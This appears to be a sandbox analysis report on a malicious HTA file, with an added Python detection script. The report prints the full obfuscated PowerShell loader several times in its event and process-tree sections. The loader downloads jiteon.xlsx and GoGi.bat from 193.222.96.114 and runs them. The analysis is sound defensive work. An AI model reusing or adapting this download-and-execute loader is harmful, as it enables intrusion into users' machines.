Source: Network Connection | Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0', Tim Shelton | Data: DestinationIp: 13.107.246.41, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7500, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49755
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7332, TargetFilename: C:\Users\user\AppData\Roaming\GoGi.bat
Source: Process started | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRf
Source: Network Connection | Author: X__Junior (Nextron Systems) | Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49755, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7500, Protocol: tcp, SourceIp: 13.107.246.41, SourceIsIpv6: false, SourcePort: 443
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRf
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7916, ProcessName: svchost.exe
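The Sigma hits above come down to three relationships in the process tree: mshta.exe spawning an interpreter, powershell.exe started with -ExecutionPolicy UnRestricted, and powershell.exe writing a .bat into AppData\Roaming. The script below is an added example written for this page, not the Sigma rules' own logic; it restates those three checks in simplified form and runs them over a constructed Sysmon-style event list. PIDs, image paths and command-line fragments are copied from the process tree, while the event layout, the parent of mshta.exe (not shown in the report), the interpreter and extension lists, and the function names are mine. The ancestry walk at the end answers the question a responder actually asks of the last hidden PowerShell (PID 7828): does it descend from the HTA?

```python
"""Simplified process-tree checks for the behaviours that fired Sigma rules in
this report, run over constructed Sysmon-style events. Added example for this
page; not the Sigma rules' own code. Event layout, lists and names are mine."""
import re

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\system32\cmd.exe"

# Constructed events mirroring the process tree; long command lines are truncated.
EVENTS = [
    {"type": "process", "pid": 7240, "ppid": 0, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Users\user\Desktop\hta.hta"'},
    {"type": "process", "pid": 7332, "ppid": 7240, "image": PS,
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted '
                r'function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)}'},
    {"type": "file", "pid": 7332, "image": PS32, "target": r"C:\Users\user\AppData\Roaming\jiteon.xlsx"},
    {"type": "file", "pid": 7332, "image": PS32, "target": r"C:\Users\user\AppData\Roaming\GoGi.bat"},
    {"type": "process", "pid": 7500, "ppid": 7332,
     "image": r"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE",
     "cmdline": r'"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Roaming\jiteon.xlsx"'},
    {"type": "process", "pid": 7536, "ppid": 7332, "image": CMD,
     "cmdline": r'C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\GoGi.bat" "'},
    {"type": "process", "pid": 7580, "ppid": 7536, "image": CMD,
     "cmdline": r'C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\GoGi.bat"'},
    {"type": "process", "pid": 7628, "ppid": 7580, "image": CMD,
     "cmdline": r"""C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\GoGi.bat';powershell -w hidden;"""},
    {"type": "process", "pid": 7636, "ppid": 7628, "image": PS, "cmdline": PS},
    {"type": "process", "pid": 7828, "ppid": 7636, "image": PS, "cmdline": '"' + PS + '" -w hidden'},
]

# Cut-down lists for the example; production rules carry longer ones.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}
SCRIPT_EXT = {"bat", "cmd", "ps1", "vbs", "js", "hta", "exe", "dll"}
# -ExecutionPolicy or any prefix PowerShell accepts (-ep, -ex, -exec) set to a no-check level.
INSECURE_POLICY = re.compile(r"-(?:ep|ex\w*)\s+(?:unrestricted|bypass)\b", re.I)
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, pid, detail) for every event matching one of the three checks."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    alerts = []
    for e in events:
        if e["type"] == "process":
            parent = procs.get(e["ppid"])
            if parent and basename(parent["image"]) == "mshta.exe" and basename(e["image"]) in INTERPRETERS:
                alerts.append(("mshta_child_process", e["pid"], basename(e["image"])))
            m = INSECURE_POLICY.search(e["cmdline"]) if basename(e["image"]) in POWERSHELL else None
            if m:
                alerts.append(("insecure_execution_policy", e["pid"], m.group(0)))
        elif e["type"] == "file":
            ext = basename(e["target"]).rpartition(".")[2]
            if basename(e["image"]) in POWERSHELL and ext in SCRIPT_EXT:
                alerts.append(("script_dropped_by_powershell", e["pid"], e["target"]))
    return alerts


def ancestry(events, pid):
    """Image names from the given process up to the root of the recorded tree."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    chain = []
    while pid in procs:
        chain.append(basename(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return chain


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
    print("7828 lineage:", " <- ".join(ancestry(EVENTS, 7828)))
```

Only PID 7332 trips all three checks; the later PowerShell instances (7636, 7828) carry no policy switch and drop nothing, so on a host without parent-child context they would look like ordinary interactive shells. The ancestry walk is what ties them back to mshta.exe, which is why process-lineage fields in endpoint telemetry matter more here than any single command line.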
No Snort rule has matched

AV Detection

Source: hta.hta | Avira: detected
Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
Source: http://193.222.96.114 | Virustotal: Detection: 10%
Source: http://193.222.96.114:7287/jiteon.xlsx | Virustotal: Detection: 15%
Source: http://193.222.96.114:7287/GoGi.bat | Virustotal: Detection: 11%
Source: http://193.222.96.11 | Virustotal: Detection: 6%
Source: hta.hta | Virustotal: Detection: 39%
Source: hta.hta | ReversingLabs: Detection: 39%
Source: unknown | HTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.4:49755 version: TLS 1.2

Networking

Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 7287
Source: unknown | Network traffic detected: HTTP traffic on port 7287 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 7287
Source: unknown | Network traffic detected: HTTP traffic on port 7287 -> 49731
Source: global traffic | TCP traffic: 192.168.2.4:49730 -> 193.222.96.114:7287
Source: global traffic | HTTP traffic detected: GET /jiteon.xlsx HTTP/1.1 | Host: 193.222.96.114:7287 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /GoGi.bat HTTP/1.1 | Host: 193.222.96.114:7287
Source: Joe Sandbox View | IP Address: 13.107.246.41
Source: Joe Sandbox View | IP Address: 13.107.246.41
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknown | TCP traffic detected without corresponding DNS query: 193.222.96.114 (39 identical entries; the download host is addressed by raw IP, so no DNS lookup precedes the connections)
Source: global trafficHTTP traffic detected: GET /rules/rule170012v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule63067v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /jiteon.xlsx HTTP/1.1Host: 193.222.96.114:7287Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /GoGi.bat HTTP/1.1Host: 193.222.96.114:7287
Source: powershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1760006008.0000000005567000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://193.222.96.114:7287
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://193.222.96.114:7287/GoGi.bat
Source: powershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://193.222.96.114:7287/jiteon.xlsx
Source: svchost.exe, 0000000B.00000002.2966470735.000002AB2DCC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.3.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB33228000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.11.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.11.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.11.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB33228000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB33228000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB3325D000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.11.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1760006008.0000000004FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1786540892.0000000004CC3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.1786540892.0000000004C87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6LR
Source: powershell.exe, 00000001.00000002.1760006008.0000000004FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1786540892.0000000004CA6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB332D2000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.dr | String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.11.dr, qmgr.db.11.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.11.dr, qmgr.db.11.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.11.dr, qmgr.db.11.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB332D2000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB332D2000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.11.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown | HTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.4:49755 version: TLS 1.2

System Summary

Source: Process Memory Space: powershell.exe PID: 7332, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\SysWOW64\mshta.exe | Process created: Commandline size = 2066
Source: C:\Windows\SysWOW64\cmd.exe | Process created: Commandline size = 2190
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: Process Memory Space: powershell.exe PID: 7332, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.troj.winHTA@22/17@0/3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\jiteon.xlsx
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_whkbyoyv.adm.ps1
Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: hta.hta | Virustotal: Detection: 39%
Source: hta.hta | ReversingLabs: Detection: 39%
Source: powershell.exe | String found in binary or memory: prompt"PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) ";# .Link# https://go.microsoft.com/fwlink/?LinkID=225750# .ExternalHelp System.Management.Automation.dll-help.xml$global:?
Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\hta.hta"
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Roaming\jiteon.xlsx"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\GoGi.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\GoGi.bat"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
